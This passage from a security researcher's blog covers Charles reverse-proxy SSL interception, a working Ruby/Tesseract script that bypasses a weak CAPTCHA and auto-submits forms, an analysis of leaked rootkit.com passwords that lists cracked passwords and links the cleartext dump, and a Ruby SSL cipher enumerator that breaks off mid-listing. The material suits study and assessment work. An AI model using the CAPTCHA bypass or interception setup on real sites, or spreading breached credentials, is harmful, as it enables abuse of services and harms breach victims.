To summarize the reverse proxy settings (two entries):<br />
<b>Entry 1:</b> Forward all SSL traffic to mail.google.com:443<br />
Listening on : 127.0.0.1:443<br />
Forwarding to: 74.125.226.181:443 (one of the four resolved addresses)<br />
<br />
<b>Entry 2: </b>Forward plain HTTP as well<br />
Listening on : 127.0.0.1:80<br />
Forwarding to: 74.125.226.181:80</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj486r4NgXWlR3bSJ6BPQ8WdJ1-myQPWlFrosAaQov0S9zArmNNGlIM8-MAD43WRXwn2uMF1zOnOpMXNrtXqt3fVUHyUT0mq4sAv2GBi2wiXhbo63hcSQoWM3QWMOwfMxDggsqSX3NfC4XQ/s1600/reverse--proxy--settings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj486r4NgXWlR3bSJ6BPQ8WdJ1-myQPWlFrosAaQov0S9zArmNNGlIM8-MAD43WRXwn2uMF1zOnOpMXNrtXqt3fVUHyUT0mq4sAv2GBi2wiXhbo63hcSQoWM3QWMOwfMxDggsqSX3NfC4XQ/s1600/reverse--proxy--settings.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows reverse proxy settings in Charles</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPes6gQexQTxATZmV8Ia_r6WbHwZnMRFo9_A5Xvp49bjOJkYbtRXr9qjHHAWN-Zu1XbRGD8E3jZe0f5ZySFB8jgAEOZouI3ccO1HjIcAo4l2vcqNmPYG30yCU2uyD5PSrYLijnwM7dCCWO/s1600/gmail--error.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPes6gQexQTxATZmV8Ia_r6WbHwZnMRFo9_A5Xvp49bjOJkYbtRXr9qjHHAWN-Zu1XbRGD8E3jZe0f5ZySFB8jgAEOZouI3ccO1HjIcAo4l2vcqNmPYG30yCU2uyD5PSrYLijnwM7dCCWO/s400/gmail--error.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows the certificate error issued when https://mail.google.com is accessed via the reverse proxy. Choosing the "Trust Certificate" option allows SSL traffic to be intercepted.</td></tr>
</tbody></table>
<br /></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com21tag:blogger.com,1999:blog-4663432300421783651.post-76316961467521101272011-03-19T08:59:00.000-07:002011-03-20T00:57:37.178-07:00Breaking A Weak CAPTCHA implementation<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: inherit;">A while back I came across a web application that implemented a captcha to prevent automated form entries. The captcha was weak and could be solved easily. Below I summarize the steps followed and provide the sample Ruby scripts that were used to perform automated form submissions. The page names, form fields, etc. are fictitious and do not reflect the exact application data or behavior.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">So let's get started. Here is one sample captcha obtained from the website.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlib5foHa52bFP4QwlWYlU_sMMWakCY_TxPPz51l-FbNTDKbGA7pPp9vr7ZTtkVE9OWbjBUZ1nYd2vMXOtIRDn35XwWjgQKCLl7p53padgtp0mCLUkIhVh_gX0y6Z0gwBU5jVTj1ZnUpam/s1600/19.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlib5foHa52bFP4QwlWYlU_sMMWakCY_TxPPz51l-FbNTDKbGA7pPp9vr7ZTtkVE9OWbjBUZ1nYd2vMXOtIRDn35XwWjgQKCLl7p53padgtp0mCLUkIhVh_gX0y6Z0gwBU5jVTj1ZnUpam/s1600/19.bmp" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">My first thought was to try the free "OCR to text" conversion service provided by the folks at <a href="http://www.free-ocr.com/">Free-Ocr</a>. I uploaded a few captchas to the website and it successfully solved almost all of them. One solved captcha is shown below.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxGhWYHNxCnkUXGXYziB2Wi3Bo6RoWZYd1bZiaE0YNvViq8O7xG73KlAwKdXanaRgUSiVrRSotgE7H8skSvSuVyRSitvEOSe5qRS02N12BU18VfdhLWMUa8v0x_cucdUkMuCZrEyuWBdY8/s1600/free--ocr--ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxGhWYHNxCnkUXGXYziB2Wi3Bo6RoWZYd1bZiaE0YNvViq8O7xG73KlAwKdXanaRgUSiVrRSotgE7H8skSvSuVyRSitvEOSe5qRS02N12BU18VfdhLWMUa8v0x_cucdUkMuCZrEyuWBdY8/s320/free--ocr--ss.png" width="320" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Now I knew that the captcha could be solved, and needed a way to automate the solving. I turned to <a href="http://code.google.com/p/tesseract-ocr/">Tesseract</a> to do that for me. Tesseract enjoys the reputation of being <span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">one of the most accurate open source OCR engines available.</span></span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: inherit; line-height: 16px;"><br />
</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: inherit; line-height: 16px;">Tesseract was downloaded and installed on a Windows box. The page requiring captcha input was sourcing captchas from a PHP script on the web server; let's say its path is http://www.test.com/get_captcha.php. The following script downloads a sample captcha, stores it on the local file system and then solves it. </span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">require 'net/http'<br />
tesseract = 'C:\Tesseract-OCR\tesseract.exe'<br />
q = Net::HTTP.new('www.test.com', 80)<br />
# Download a new captcha<br />
r = q.get("/get_captcha.php")<br />
# Write the image bytes as-is (puts would append a newline and corrupt the file)<br />
File.open("captcha.bmp", 'wb') do |f|<br />
&nbsp;&nbsp;f.write r.body<br />
end<br />
# Solve the CAPTCHA; Tesseract writes the recognised text to captcha.txt<br />
system("#{tesseract} captcha.bmp captcha")</span><br />
<div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">Most of the sourced captchas could be successfully solved using the script above. Good! </span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">The next obvious step was to automate the entire form submission process. The application used <span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; line-height: 15px;"><em style="font-style: normal;">PHPSESSIONID</em></span> to associate captchas with sessions: http://www.test.com/home.php issued the PHPSESSIONID, and the same session value was sent to <b>/get_captcha.php</b> to retrieve a captcha. To automate the process, the following was required:</span></div><div><ol style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px; text-align: left;"><li><span class="Apple-style-span" style="font-family: inherit;">GET the /home.php page and capture the value of PHPSESSIONID.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Solve the captcha locally</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">POST the form fields along with PHPSESSIONID and the captcha value</span></li>
</ol><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">A few more lines to the script above would serve our purpose. The final script looked like below:</span></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">require 'net/http'<br />
tesseract = 'C:\Tesseract-OCR\tesseract.exe'<br />
q = Net::HTTP.new('www.test.com', 80)<br />
# Fetch the home page to obtain a session cookie<br />
r = q.get("/home.php")<br />
r['set-cookie'] =~ /PHPSESSIONID=(.*?);/<br />
hdr = {'Cookie' => "PHPSESSIONID=#{$1}"}<br />
# Get a captcha tied to that PHPSESSIONID and solve it<br />
r = q.get("/get_captcha.php", hdr)<br />
File.open("captcha.bmp", 'wb') do |f|<br />
&nbsp;&nbsp;f.write r.body<br />
end<br />
system("#{tesseract} captcha.bmp captcha")<br />
# Read the recognised value and POST the form along with the same PHPSESSIONID<br />
captcha = File.read("captcha.txt").strip<br />
q.post('/save_details.php', "fname=gursev&lname=kalra&captcha=#{captcha}", hdr)</span><br />
<div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px; text-align: left;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><b><span class="Apple-style-span" style="font-family: inherit;">Further Analysis:</span></b></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">The captcha implementation appeared to have more issues. During the analysis around 100 captchas were solved and their values analyzed. Here are the various observations:</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"></div><ol style="text-align: left;"><li><span class="Apple-style-span" style="font-family: inherit;">Captchas contained only numerals, and hence a smaller number of possible combinations.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Out of 100 captchas, around 4 duplicates were identified. That's around 4% of the total captchas issued.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Captchas had an uneven character distribution, with 4's and 5's getting the maximum share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.</span></li>
</ol></div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com2tag:blogger.com,1999:blog-4663432300421783651.post-56424221592775602011-02-14T09:55:00.000-08:002011-07-02T02:34:26.717-07:00SSLSmart v1.0 Released<div dir="ltr" style="text-align: left;" trbidi="on">Back in 2009, I went to a local OWASP chapter meet and presented an SSL cipher enumeration script that I was using to enumerate SSL ciphers for my assessments. Feedback was good, but soon other things piled up and the script got buried. Later I realized the need to evolve the concept into an open source, cross-platform free tool, and named it SSLSmart.<br />
<br />
SSLSmart was released last month and the tool can be downloaded from <a href="http://packetstormsecurity.org/files/98035/SSLSmart-SSL-Testing-Tool-1.0.html">here</a> (Packetstorm). If you would like to read the whitepaper before downloading the entire zip file, you can obtain it from <a href="http://dl.packetstormsecurity.net/papers/general/SSLSmart_WhitePaper_V1.0.pdf">here</a> (Packetstorm).<br />
<br />
Here is what a sample SSLSmart run looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZF9T1p2Ji-9gEE_Zr2Ss2n4wBk1l__u0pqQJzhayXDyhSBYui5MfirWEGKgY2QoUb9K_PGSvpIj0279Ct_YVXQAYL0J2Ku0Qs4Xb_YCMoZzxVlthZJaQwDelF_spWxAZOqX0lY7x7ahhyphenhyphen/s1600/linux_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZF9T1p2Ji-9gEE_Zr2Ss2n4wBk1l__u0pqQJzhayXDyhSBYui5MfirWEGKgY2QoUb9K_PGSvpIj0279Ct_YVXQAYL0J2Ku0Qs4Xb_YCMoZzxVlthZJaQwDelF_spWxAZOqX0lY7x7ahhyphenhyphen/s640/linux_screenshot.png" width="619" /></a></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-77261778519196193642011-02-13T05:30:00.000-08:002011-02-13T21:47:07.001-08:00Rootkit.com Password Analysis<div dir="ltr" style="text-align: left;" trbidi="on">rootkit.com succumbed to a social engineering attack, and more than 42,000 of its users' passwords were made available on the internet in the clear (<a href="http://dazzlepod.com/site_media/txt/rootkit_people_cleartext.txt">here</a>). John the Ripper was used to recover the passwords. Out of curiosity, I analyzed certain aspects of these passwords. The results of that analysis are shared below:<br />
<br />
<div><b>Password Lengths: </b>The shortest password in the list was 1 character long and the longest was 20 characters. A whopping 38.74% of passwords were 6 characters in length. Here is the distribution of password lengths:</div><div><div style="text-align: -webkit-auto;"><br />
<table border="1"><tbody>
<tr><td><b> Length </b></td><td><b> Occurrences </b></td><td><b> Percentage </b></td></tr>
<tr><td>1 </td><td>16 </td><td>0.04% </td></tr>
<tr><td>2 </td><td>20 </td><td>0.05% </td></tr>
<tr><td>3 </td><td>270 </td><td>0.64% </td></tr>
<tr><td>4 </td><td>1444 </td><td>3.41% </td></tr>
<tr><td>5 </td><td>2646 </td><td>6.24% </td></tr>
<tr><td>6 </td><td>16424 </td><td>38.76% </td></tr>
<tr><td>7 </td><td>8258 </td><td>19.49% </td></tr>
<tr><td>8 </td><td>9786 </td><td>23.09% </td></tr>
<tr><td>9 </td><td>2029 </td><td>4.79% </td></tr>
<tr><td>10 </td><td>971 </td><td>2.29% </td></tr>
<tr><td>11 </td><td>250 </td><td>0.59% </td></tr>
<tr><td>12 </td><td>157 </td><td>0.37% </td></tr>
<tr><td>13 </td><td>62 </td><td>0.15% </td></tr>
<tr><td>14 </td><td>23 </td><td>0.05% </td></tr>
<tr><td>15 </td><td>8 </td><td>0.02% </td></tr>
<tr><td>16 </td><td>3 </td><td>0.01% </td></tr>
<tr><td>17 </td><td>1 </td><td>0.00% </td></tr>
<tr><td>18 </td><td>0 </td><td>0.00% </td></tr>
<tr><td>19 </td><td>2 </td><td>0.00% </td></tr>
<tr><td>20 </td><td>4 </td><td>0.01% </td></tr>
</tbody></table><br />
<b>Password Entropy:</b><br />
The entropy of each cracked password was calculated using the entropy function of Eric Monti's <a href="http://emonti.github.com/rbkb/">rbkb</a>, which performs a chi-square calculation. Clearly, the higher the entropy, the lower the chance that your password will be guessed or cracked. Having said that, how easy is it to remember and key in passwords that are extremely random and more than 16 characters long?<br />
<br />
<table border="1"><tbody>
<tr><td><b> Entropy </b></td><td><b> Count </b></td></tr>
<tr><td>0 to <1 </td><td>1620 </td></tr>
<tr><td>1 to <2 </td><td>7388 </td></tr>
<tr><td>2 to <3 </td><td>32071 </td></tr>
<tr><td>3 to <4 </td><td>1292 </td></tr>
<tr><td>4 to <5 </td><td>3 </td></tr>
<tr><td>5 to <6 </td><td>0 </td></tr>
<tr><td>6 to <7 </td><td>0 </td></tr>
</tbody></table><br />
<br />
<br />
<b>Cracked Passwords with Highest Entropy: </b><br />
Certain cracked passwords had entropy in excess of 4 bits. The table below lists the cracked passwords with the highest entropy. A good dictionary allowed JTR to crack most of the passwords.<br />
<br />
<table border="1"><tbody>
<tr><td><b> # </b></td><td><b> Entropy </b></td><td><b> Password </b></td></tr>
<tr><td>1 </td><td>4.321928095 </td><td>q1w2e3r4t5y6u7i8o9p0 </td></tr>
<tr><td>2 </td><td>4.321928095 </td><td>1234567890qwertyuiop </td></tr>
<tr><td>3 </td><td>4.321928095 </td><td>1q2w3e4r5t6y7u8i9o0p </td></tr>
<tr><td>4 </td><td>4 </td><td>1234qwerasdfzxcv </td></tr>
<tr><td>5 </td><td>3.807354922 </td><td>abcdefg1234567 </td></tr>
<tr><td>6 </td><td>3.700439718 </td><td>qwertyuiop123 </td></tr>
<tr><td>7 </td><td>3.700439718 </td><td>superman12345 </td></tr>
<tr><td>8 </td><td>3.700439718 </td><td>1qazxcvbnm,./ </td></tr>
<tr><td>9 </td><td>3.664497779 </td><td>kingoftheworld </td></tr>
<tr><td>10 </td><td>3.664497779 </td><td>qwertyuiop[]\\ </td></tr>
<tr><td>11 </td><td>3.584962501 </td><td>!@#$%^&*()_+ </td></tr>
<tr><td>12 </td><td>3.584962501 </td><td>fucktheworld </td></tr>
<tr><td>13 </td><td>3.584962501 </td><td>1q2w3e!Q@W#E </td></tr>
<tr><td>14 </td><td>3.584962501 </td><td>qazxswedcvfr </td></tr>
<tr><td>15 </td><td>3.584962501 </td><td>123qweasdzxc </td></tr>
<tr><td>16 </td><td>3.584962501 </td><td>1qazxsw23edc </td></tr>
<tr><td>17 </td><td>3.584962501 </td><td>q1w2e3r4t5y6 </td></tr>
<tr><td>18 </td><td>3.584962501 </td><td>asdfghjkl;\' </td></tr>
<tr><td>19 </td><td>3.584962501 </td><td>qwerty123456 </td></tr>
<tr><td>20 </td><td>3.584962501 </td><td>4rfv5tgb6yhn </td></tr>
<tr><td>21 </td><td>3.584962501 </td><td>qwe123rty456 </td></tr>
<tr><td>22 </td><td>3.584962501 </td><td>1qaz2wsx3edc </td></tr>
<tr><td>23 </td><td>3.584962501 </td><td>1a2b3c4d5e6f </td></tr>
<tr><td>24 </td><td>3.584962501 </td><td>123456qwerty </td></tr>
<tr><td>25 </td><td>3.584962501 </td><td>1q2w3e4r5t6y </td></tr>
</tbody></table><br />
<br />
<b>Password Distribution:</b><br />
Finally, I looked at password distribution by character class. An overwhelming 51% of cracked passwords were lowercase only; this was followed by numeric-only passwords at close to 24%. Passwords using uppercase letters along with numerals were the least favourite.<br />
<br />
<table border="1"><tbody>
<tr><td><b> Password Type </b></td><td><b> Percentage Share </b></td></tr>
<tr><td>Only Lowercase </td><td>51.81 </td></tr>
<tr><td>Lowercase AND Numerals </td><td>23.92 </td></tr>
<tr><td>Only Numeric </td><td>19.9 </td></tr>
<tr><td>Alphabets (Uppercase AND Lowercase) </td><td>1.32 </td></tr>
<tr><td>Alphanumeric </td><td>1.25 </td></tr>
<tr><td>Passwords With Special Characters </td><td>1.11 </td></tr>
<tr><td>Only Uppercase </td><td>0.45 </td></tr>
<tr><td>Uppercase AND Numerals </td><td>0.24 </td></tr>
</tbody></table><br />
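The post does not publish the script behind these tables, so here is an added Ruby example (not the author's code) that reproduces the three measurements on a constructed sample: the length histogram, per-password entropy bucketed as in the entropy table, and the character-class split. The entropy function is Shannon entropy of the character frequencies within one password, which yields exactly the figures in the tables (20 distinct characters give log2(20) = 4.321928095, 16 give 4, 13 give 3.700439718). SAMPLE_PASSWORDS and every function name are constructed for this example; the sample is not taken from the leaked list.

```ruby
# Added example (not the post's own script): the three measurements above,
# reproduced in Ruby on a constructed sample. Entropy here is Shannon
# entropy of the character frequencies within one password, which yields
# the figures in the tables (20 distinct chars -> log2(20) = 4.321928095).

# Shannon entropy (bits per character) of a single string.
def shannon_entropy(str)
  return 0.0 if str.empty?
  counts = Hash.new(0)
  str.each_char { |c| counts[c] += 1 }
  len = str.length.to_f
  counts.values.inject(0.0) do |sum, n|
    p = n / len
    sum - p * Math.log2(p)
  end
end

# Length histogram as [[length, count, percentage], ...], sorted by length.
def length_distribution(passwords)
  total = passwords.size.to_f
  hist = Hash.new(0)
  passwords.each { |pw| hist[pw.length] += 1 }
  hist.sort.map { |len, n| [len, n, (100.0 * n / total).round(2)] }
end

# "k to <k+1" entropy buckets as in the table above: { k => count }.
def entropy_buckets(passwords)
  buckets = Hash.new(0)
  passwords.each { |pw| buckets[shannon_entropy(pw).floor] += 1 }
  buckets.sort.to_h
end

# Top-n passwords by entropy: [[entropy, password], ...], highest first.
def highest_entropy(passwords, n = 5)
  passwords.map { |pw| [shannon_entropy(pw).round(9), pw] }
           .sort_by { |e, pw| [-e, pw] }
           .first(n)
end

# Character-class categories from the "Password Distribution" table.
# Anything outside [A-Za-z0-9] counts as a special character first; the
# rest are classified by which of lower/upper/digit they mix.
def password_class(pw)
  return "Empty" if pw.empty?
  return "Passwords With Special Characters" if pw =~ /[^A-Za-z0-9]/
  lower = !!(pw =~ /[a-z]/)
  upper = !!(pw =~ /[A-Z]/)
  digit = !!(pw =~ /[0-9]/)
  case [lower, upper, digit]
  when [true, false, false] then "Only Lowercase"
  when [false, true, false] then "Only Uppercase"
  when [false, false, true] then "Only Numeric"
  when [true, false, true]  then "Lowercase AND Numerals"
  when [false, true, true]  then "Uppercase AND Numerals"
  when [true, true, false]  then "Alphabets (Uppercase AND Lowercase)"
  else "Alphanumeric" # lower + upper + digits
  end
end

# Percentage share per class, largest first: [[class, percentage], ...].
def class_distribution(passwords)
  total = passwords.size.to_f
  counts = Hash.new(0)
  passwords.each { |pw| counts[password_class(pw)] += 1 }
  counts.map { |k, n| [k, (100.0 * n / total).round(2)] }.sort_by { |_, pct| -pct }
end

# Constructed sample, NOT taken from the leaked list.
SAMPLE_PASSWORDS = %w[
  123456 password qwerty 12345678 abc123 letmein monkey dragon
  q1w2e3r4t5y6u7i8o9p0 1234qwerasdfzxcv superman12345 Passw0rd
  ADMIN ADMIN1 MixedCase !@#$%^&*()_+ 111111 iloveyou
].freeze

if $PROGRAM_NAME == __FILE__
  puts "Length  Count  Percent"
  length_distribution(SAMPLE_PASSWORDS).each { |l, n, pct| puts format("%6d  %5d  %6.2f%%", l, n, pct) }
  puts "\nEntropy buckets: #{entropy_buckets(SAMPLE_PASSWORDS)}"
  puts "\nHighest entropy:"
  highest_entropy(SAMPLE_PASSWORDS, 3).each { |e, pw| puts format("%.9f  %s", e, pw) }
  puts "\nClass share:"
  class_distribution(SAMPLE_PASSWORDS).each { |k, pct| puts format("%-40s %6.2f%%", k, pct) }
end
```

Note that the high-entropy entries in the table above (keyboard walks such as q1w2e3r4t5y6u7i8o9p0) score well only because per-character entropy measures how varied the characters are, not how predictable the pattern is, which is exactly why a good dictionary still cracked them.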
<br />
<br />
<br />
</div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-72089729946049027852009-09-12T00:33:00.000-07:002013-09-23T12:17:32.750-07:00Ruby and OpenSSL Based SSL Cipher Enumeration<div dir="ltr" style="text-align: left;" trbidi="on">
In this post, we will write a bare-bones Ruby based SSL cipher enumerator to enumerate the SSL cipher suites supported by a web server. Without further delay, let's get started.<br />
<br />
<span style="font-weight: bold;">Basics:</span><br />
The first step of every SSL communication is the SSL handshake. During the handshake, client and server settle on a common cipher suite to use for the session. The client-initiated "Client Hello" provides the server with all the cipher suites the client supports. The server responds with the cipher suite it wants to use in the "Server Hello" message. The image below shows the list of cipher suites sent to the web server in the Client Hello.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIIECmJFy6rL5J7v4K4URPWssFkslVetSdxjkdIAgtv6u6hyphenhyphen90LdLt_LkWt7BtVEQjuc3bPAJBmtur_L15_LhyLqRmTB0xE78EEoc6i3C9iIeXt3qG-W29wM5mGRIuhjUgy9dl5WDfwNb/s1600-h/OpenSSL_All_Ciphers.png"><img alt="" border="0" height="296" id="BLOGGER_PHOTO_ID_5380560967535877490" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIIECmJFy6rL5J7v4K4URPWssFkslVetSdxjkdIAgtv6u6hyphenhyphen90LdLt_LkWt7BtVEQjuc3bPAJBmtur_L15_LhyLqRmTB0xE78EEoc6i3C9iIeXt3qG-W29wM5mGRIuhjUgy9dl5WDfwNb/s400/OpenSSL_All_Ciphers.png" style="height: 474px; margin: 0px auto 10px; text-align: center; width: 640px;" width="400" /></a><br />
<br />
To enumerate supported SSL ciphers reliably, we need to initiate an SSL connection offering only one cipher suite (for one protocol version) at a time and observe the server's response.<br />
<br />
<br />
<span style="font-weight: bold;">Initial housekeeping</span><br />
===============================<br />
<ol>
<li><span style="font-family: courier new;">require 'net/https'</span></li>
<li><span style="font-family: courier new;">target_url = "mail.google.com" # Target website</span></li>
<li><span style="font-family: courier new;">port = 443 # Target port</span></li>
<li><span style="font-family: courier new;">protocol_versions = [:SSLv2, :SSLv3, :TLSv1] # Protocol versions to test</span></li>
</ol>
<br />
<span style="font-weight: bold;">Extending the HTTP Class</span><br />
===============================<br />
We will now extend the HTTP class with two methods that let us request the application's home page with one cipher suite at a time. Since classes in Ruby are open (not closed), we can simply reopen the existing Net::HTTP class. <br />
<ol>
<li><span style="font-family: courier new;">module Net</span></li>
<li><span style="font-family: courier new;">class HTTP</span></li>
<li><span style="font-family: courier new;">def set_context=(value)</span></li>
<li><span style="font-family: courier new;">@ssl_context = OpenSSL::SSL::SSLContext.new </span></li>
<li><span style="font-family: courier new;">@ssl_context &&= OpenSSL::SSL::SSLContext.new(value) </span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">ssl_context_accessor :ciphers</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
</ol>
<span style="font-weight: bold;">Lines 3-6:</span><br />
<span style="font-family: courier new;">def set_context=(value)</span><br />
<span style="font-family: courier new;">@ssl_context = OpenSSL::SSL::SSLContext.new </span><span style="font-family: courier new;"><br />
@ssl_context &&= OpenSSL::SSL::SSLContext.new(value) </span><span style="font-family: courier new;"><br />
end<br />
</span>The <span style="font-family: courier new;">set_context= </span>method lets us set the SSL context for one HTTP request. By setting the context for an HTTP request, we enforce the use of the cipher suite and protocol version of our choice.<br />
<br />
<span style="font-weight: bold;">Line 8:</span><br />
<span style="font-family: courier new;">ssl_context_accessor :ciphers</span><br />
It creates two methods:<br />
<ol>
<li>ciphers : Returns the cipher suite value in use.</li>
<li>ciphers= : Sets the cipher suite for the current request.</li>
</ol>
For more information about ssl_context_accessor, please refer to net/https.rb in your Ruby installation directory.<br />
<br />
<br />
<span style="font-weight: bold;">Getting it to work:</span><br />
===============================<br />
<ol>
<li><span style="font-family: courier new;">protocol_versions.each do |version| </span></li>
<li><span style="font-family: courier new;">cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers</span></li>
<li><span style="font-family: courier new;">puts "\n======================================="</span></li>
<li><span style="font-family: courier new;">puts version</span></li>
<li><span style="font-family: courier new;">puts "========================================="</span></li>
<li><span style="font-family: courier new;">cipher_set.each do |cipher_name, ignore_me_cipher_version, bits, ignore_me_algorithm_bits| </span></li>
<li><span style="font-family: courier new;">request = Net::HTTP.new(target_url, port)</span></li>
<li><span style="font-family: courier new;">request.use_ssl = true</span></li>
<li><span style="font-family: courier new;">request.set_context = version</span></li>
<li><span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span></li>
<li><span style="font-family: courier new;">request.ciphers = cipher_name</span></li>
<li><span style="font-family: courier new;">begin</span></li>
<li><span style="font-family: courier new;">response = request.get("/")</span></li>
<li><span style="font-family: courier new;">puts "[+] Accepted\t #{bits} bits\t#{cipher_name}"</span></li>
<li><span style="font-family: courier new;">rescue OpenSSL::SSL::SSLError => e</span></li>
<li><span style="font-family: courier new;">puts "[-] Rejected\t #{bits} bits\t#{cipher_name}"</span></li>
<li><span style="font-family: courier new;">rescue #Ignore all other Exceptions</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
</ol>
<br />
<strong>Line 1:</strong><br />
<span style="font-family: courier new;">protocol_versions.each do |version|</span><br />
Loop through the protocol versions we are testing and pass each value to the code block.<br />
<strong>Line 2:</strong><br />
<span style="font-family: courier new;">cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers</span><br />
Create a new context for the given protocol version and return all the ciphers supported by the OpenSSL version against which your Ruby installation was compiled. The returned value is an array of arrays; each element has the format [name, version, bits, alg_bits]. Here <span style="font-weight: bold;">name</span> is the cipher suite name, <span style="font-weight: bold;">version </span>is the protocol version (SSLv2, TLSv1/SSLv3), <span style="font-weight: bold;">bits</span> is the key length in bits and <span style="font-weight: bold;">alg_bits</span> is the key length supported by the encryption algorithm.<br />
<br />
An example cipher suite array for SSLv2 protocol:<br />
<span style="font-family: courier new;">[<br />
["DES-CBC3-MD5", "SSLv2", 168, 168],<br />
["IDEA-CBC-MD5", "SSLv2", 128, 128],<br />
["RC2-CBC-MD5", "SSLv2", 128, 128],<br />
["RC4-MD5", "SSLv2", 128, 128],<br />
["DES-CBC-MD5", "SSLv2", 56, 56],<br />
["EXP-RC2-CBC-MD5", "SSLv2", 40, 128],<br />
